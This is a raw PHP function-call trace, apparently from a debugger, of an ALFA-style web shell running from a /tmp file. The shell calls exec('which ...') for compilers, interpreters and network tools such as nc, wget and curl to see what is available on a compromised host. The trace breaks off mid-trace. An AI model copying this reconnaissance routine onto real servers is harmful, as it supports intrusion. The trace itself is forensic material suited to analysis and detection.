5	305	0	0.028229	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'lcc'
6	306	0	0.028243	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which lcc'	FALSE	FALSE	???
7	307	0	0.028258	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which lcc'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	308	0	0.028283	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	308	1	0.028297	438264
8	308	R			TRUE
8	309	0	0.028310	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which lcc'	''
8	309	1	0.029496	438368
8	309	R			''
8	310	0	0.029519	438304	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	310	1	0.029535	438368
8	310	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	307	1	0.029561	438224
7	307	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	306	1	0.029585	438224
6	306	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	305	1	0.029618	438184
5	305	R			FALSE
5	311	0	0.029633	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'cc'
6	312	0	0.029647	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which cc'	FALSE	FALSE	???
7	313	0	0.029664	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which cc'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	314	0	0.029689	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	314	1	0.029703	438264
8	314	R			TRUE
8	315	0	0.029722	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which cc'	''
8	315	1	0.030979	438768
8	315	R			'/usr/bin/cc'
8	316	0	0.031004	438664	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/cc']
8	316	1	0.031021	438728
8	316	R			'/usr/bin/cc'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/cc'
7	313	1	0.031049	438264
7	313	R			'/usr/bin/cc'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/cc'
6	312	1	0.031074	438264
6	312	R			'/usr/bin/cc'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/cc'
5	311	1	0.031099	438184
5	311	R			11
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	++$x
5	317	0	0.031123	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'ld'
6	318	0	0.031137	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which ld'	FALSE	FALSE	???
7	319	0	0.031152	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which ld'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	320	0	0.031177	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	320	1	0.031190	438264
8	320	R			TRUE
8	321	0	0.031203	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which ld'	''
8	321	1	0.032398	438768
8	321	R			'/usr/bin/ld'
8	322	0	0.032422	438664	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/ld']
8	322	1	0.032439	438728
8	322	R			'/usr/bin/ld'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/ld'
7	319	1	0.032467	438264
7	319	R			'/usr/bin/ld'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/ld'
6	318	1	0.032493	438264
6	318	R			'/usr/bin/ld'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/ld'
5	317	1	0.032518	438184
5	317	R			11
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	++$x
5	323	0	0.032542	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'make'
6	324	0	0.032556	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which make'	FALSE	FALSE	???
7	325	0	0.032572	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which make'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	326	0	0.032596	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	326	1	0.032610	438264
8	326	R			TRUE
8	327	0	0.032623	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which make'	''
8	327	1	0.033810	438768
8	327	R			'/usr/bin/make'
8	328	0	0.033835	438664	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/make']
8	328	1	0.033852	438728
8	328	R			'/usr/bin/make'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/make'
7	325	1	0.033880	438264
7	325	R			'/usr/bin/make'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/make'
6	324	1	0.033906	438264
6	324	R			'/usr/bin/make'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/make'
5	323	1	0.033931	438184
5	323	R			13
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	++$x
5	329	0	0.033960	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'php'
6	330	0	0.033975	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which php'	FALSE	FALSE	???
7	331	0	0.033990	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which php'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	332	0	0.034015	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	332	1	0.034029	438264
8	332	R			TRUE
8	333	0	0.034042	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which php'	''
8	333	1	0.035231	438768
8	333	R			'/usr/bin/php'
8	334	0	0.035256	438664	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/php']
8	334	1	0.035273	438728
8	334	R			'/usr/bin/php'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/php'
7	331	1	0.035301	438264
7	331	R			'/usr/bin/php'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/php'
6	330	1	0.035327	438264
6	330	R			'/usr/bin/php'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/php'
5	329	1	0.035353	438184
5	329	R			12
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	++$x
5	335	0	0.035378	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'perl'
6	336	0	0.035392	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which perl'	FALSE	FALSE	???
7	337	0	0.035407	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which perl'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	338	0	0.035432	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	338	1	0.035446	438264
8	338	R			TRUE
8	339	0	0.035459	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which perl'	''
8	339	1	0.036664	438768
8	339	R			'/usr/bin/perl'
8	340	0	0.036688	438664	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/perl']
8	340	1	0.036705	438728
8	340	R			'/usr/bin/perl'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/perl'
7	337	1	0.036733	438264
7	337	R			'/usr/bin/perl'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/perl'
6	336	1	0.036759	438264
6	336	R			'/usr/bin/perl'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/perl'
5	335	1	0.036786	438184
5	335	R			13
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	++$x
5	341	0	0.036810	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'python'
6	342	0	0.036824	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which python'	FALSE	FALSE	???
7	343	0	0.036840	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which python'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	344	0	0.036866	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	344	1	0.036879	438264
8	344	R			TRUE
8	345	0	0.036892	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which python'	''
8	345	1	0.038091	438368
8	345	R			''
8	346	0	0.038115	438304	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	346	1	0.038131	438368
8	346	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	343	1	0.038180	438224
7	343	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	342	1	0.038204	438224
6	342	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	341	1	0.038228	438184
5	341	R			FALSE
5	347	0	0.038241	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'ruby'
6	348	0	0.038261	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which ruby'	FALSE	FALSE	???
7	349	0	0.038277	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which ruby'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	350	0	0.038302	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	350	1	0.038316	438264
8	350	R			TRUE
8	351	0	0.038329	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which ruby'	''
8	351	1	0.039494	438368
8	351	R			''
8	352	0	0.039516	438304	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	352	1	0.039532	438368
8	352	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	349	1	0.039558	438224
7	349	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	348	1	0.039585	438224
6	348	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	347	1	0.039608	438184
5	347	R			FALSE
5	353	0	0.039622	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'tar'
6	354	0	0.039636	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which tar'	FALSE	FALSE	???
7	355	0	0.039651	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which tar'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	356	0	0.039676	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	356	1	0.039689	438264
8	356	R			TRUE
8	357	0	0.039702	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which tar'	''
8	357	1	0.043485	438768
8	357	R			'/usr/bin/tar'
8	358	0	0.043526	438664	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/tar']
8	358	1	0.043546	438728
8	358	R			'/usr/bin/tar'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/tar'
7	355	1	0.043574	438264
7	355	R			'/usr/bin/tar'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/tar'
6	354	1	0.043602	438264
6	354	R			'/usr/bin/tar'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/tar'
5	353	1	0.043629	438184
5	353	R			12
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	++$x
5	359	0	0.043656	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'gzip'
6	360	0	0.043671	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which gzip'	FALSE	FALSE	???
7	361	0	0.043686	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which gzip'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	362	0	0.043712	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	362	1	0.043726	438264
8	362	R			TRUE
8	363	0	0.043740	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which gzip'	''
8	363	1	0.045079	438768
8	363	R			'/usr/bin/gzip'
8	364	0	0.045113	438664	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/gzip']
8	364	1	0.045131	438728
8	364	R			'/usr/bin/gzip'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/gzip'
7	361	1	0.045160	438264
7	361	R			'/usr/bin/gzip'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/gzip'
6	360	1	0.045187	438264
6	360	R			'/usr/bin/gzip'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/gzip'
5	359	1	0.045213	438184
5	359	R			13
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	++$x
5	365	0	0.045240	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'bzip'
6	366	0	0.045255	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which bzip'	FALSE	FALSE	???
7	367	0	0.045278	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which bzip'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	368	0	0.045304	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	368	1	0.045318	438264
8	368	R			TRUE
8	369	0	0.045331	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which bzip'	''
8	369	1	0.046736	438368
8	369	R			''
8	370	0	0.046775	438304	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	370	1	0.046793	438368
8	370	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	367	1	0.046821	438224
7	367	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	366	1	0.046848	438224
6	366	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	365	1	0.046872	438184
5	365	R			FALSE
5	371	0	0.046886	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'bzialfa2'
6	372	0	0.046901	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which bzialfa2'	FALSE	FALSE	???
7	373	0	0.046917	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which bzialfa2'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	374	0	0.046943	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	374	1	0.046957	438264
8	374	R			TRUE
8	375	0	0.046971	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which bzialfa2'	''
8	375	1	0.048210	438368
8	375	R			''
8	376	0	0.048242	438304	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	376	1	0.048259	438368
8	376	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	373	1	0.048287	438224
7	373	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	372	1	0.048311	438224
6	372	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	371	1	0.048336	438184
5	371	R			FALSE
5	377	0	0.048349	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'nc'
6	378	0	0.048364	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which nc'	FALSE	FALSE	???
7	379	0	0.048380	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which nc'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	380	0	0.048405	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	380	1	0.048420	438264
8	380	R			TRUE
8	381	0	0.048432	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which nc'	''
8	381	1	0.049624	438768
8	381	R			'/usr/bin/nc'
8	382	0	0.049652	438664	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/nc']
8	382	1	0.049670	438728
8	382	R			'/usr/bin/nc'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/nc'
7	379	1	0.049699	438264
7	379	R			'/usr/bin/nc'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/nc'
6	378	1	0.049735	438264
6	378	R			'/usr/bin/nc'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/nc'
5	377	1	0.049762	438184
5	377	R			11
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	++$x
5	383	0	0.049790	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'locate'
6	384	0	0.049804	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which locate'	FALSE	FALSE	???
7	385	0	0.049820	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which locate'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	386	0	0.049845	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	386	1	0.049870	438264
8	386	R			TRUE
8	387	0	0.049884	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which locate'	''
8	387	1	0.051101	438368
8	387	R			''
8	388	0	0.051125	438304	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	388	1	0.051140	438368
8	388	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	385	1	0.051166	438224
7	385	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	384	1	0.051191	438224
6	384	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	383	1	0.051214	438184
5	383	R			FALSE
5	389	0	0.051227	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1155	1	'suidperl'
6	390	0	0.051241	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which suidperl'	FALSE	FALSE	???
7	391	0	0.051257	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which suidperl'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	392	0	0.051282	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	392	1	0.051296	438264
8	392	R			TRUE
8	393	0	0.051309	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which suidperl'	''
8	393	1	0.052510	438368
8	393	R			''
8	394	0	0.052533	438304	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	394	1	0.052549	438368
8	394	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	391	1	0.052575	438224
7	391	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	390	1	0.052600	438224
6	390	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	389	1	0.052623	438184
5	389	R			FALSE
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1162	$x = 0
5	395	0	0.052649	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	1	'wget'
6	396	0	0.052663	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which wget'	FALSE	FALSE	???
7	397	0	0.052678	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which wget'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	398	0	0.052703	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	398	1	0.052717	438264
8	398	R			TRUE
8	399	0	0.052730	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which wget'	''
8	399	1	0.053970	438768
8	399	R			'/usr/bin/wget'
8	400	0	0.053995	438664	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[0 => '/usr/bin/wget']
8	400	1	0.054012	438728
8	400	R			'/usr/bin/wget'
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = '/usr/bin/wget'
7	397	1	0.054040	438264
7	397	R			'/usr/bin/wget'
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = '/usr/bin/wget'
6	396	1	0.054067	438264
6	396	R			'/usr/bin/wget'
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = '/usr/bin/wget'
5	395	1	0.054092	438184
5	395	R			13
4		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	++$x
5	401	0	0.054164	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	1	'fetch'
6	402	0	0.054179	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which fetch'	FALSE	FALSE	???
7	403	0	0.054195	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which fetch'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	404	0	0.054220	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	404	1	0.054234	438264
8	404	R			TRUE
8	405	0	0.054247	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which fetch'	''
8	405	1	0.055374	438368
8	405	R			''
8	406	0	0.055401	438304	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	406	1	0.055417	438368
8	406	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	403	1	0.055442	438224
7	403	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	402	1	0.055468	438224
6	402	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	401	1	0.055491	438184
5	401	R			FALSE
5	407	0	0.055504	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	1	'lynx'
6	408	0	0.055519	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which lynx'	FALSE	FALSE	???
7	409	0	0.055534	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which lynx'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	410	0	0.055559	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	410	1	0.055573	438264
8	410	R			TRUE
8	411	0	0.055586	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which lynx'	''
8	411	1	0.056700	438368
8	411	R			''
8	412	0	0.056723	438304	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	412	1	0.056738	438368
8	412	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	409	1	0.056764	438224
7	409	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	408	1	0.056789	438224
6	408	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	407	1	0.056812	438184
5	407	R			FALSE
5	413	0	0.056826	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	1	'links'
6	414	0	0.056840	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which links'	FALSE	FALSE	???
7	415	0	0.056855	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which links'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	416	0	0.056881	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	416	1	0.056894	438264
8	416	R			TRUE
8	417	0	0.056907	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which links'	''
8	417	1	0.058077	438368
8	417	R			''
8	418	0	0.058115	438304	join	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	2	'\n'	[]
8	418	1	0.058134	438368
8	418	R			''
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	763	$out = ''
7	415	1	0.058160	438224
7	415	R			''
6		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	$data = ''
6	414	1	0.058184	438224
6	414	R			''
5		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	$path = ''
5	413	1	0.058208	438184
5	413	R			FALSE
5	419	0	0.058221	438184	alfaWhich	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	1163	1	'curl'
6	420	0	0.058235	438224	alfaEx	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	2404	4	'which curl'	FALSE	FALSE	???
7	421	0	0.058251	438224	_alfa_php_cmd	1		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	744	2	'which curl'	FALSE
7		A						/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	758	$out = ''
8	422	0	0.058276	438224	function_exists	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	761	1	'exec'
8	422	1	0.058290	438264
8	422	R			TRUE
8	423	0	0.058303	438248	exec	0		/tmp/sesss_421aa90e079fa326b6494f812ad13e79.php	762	2	'which curl'	''
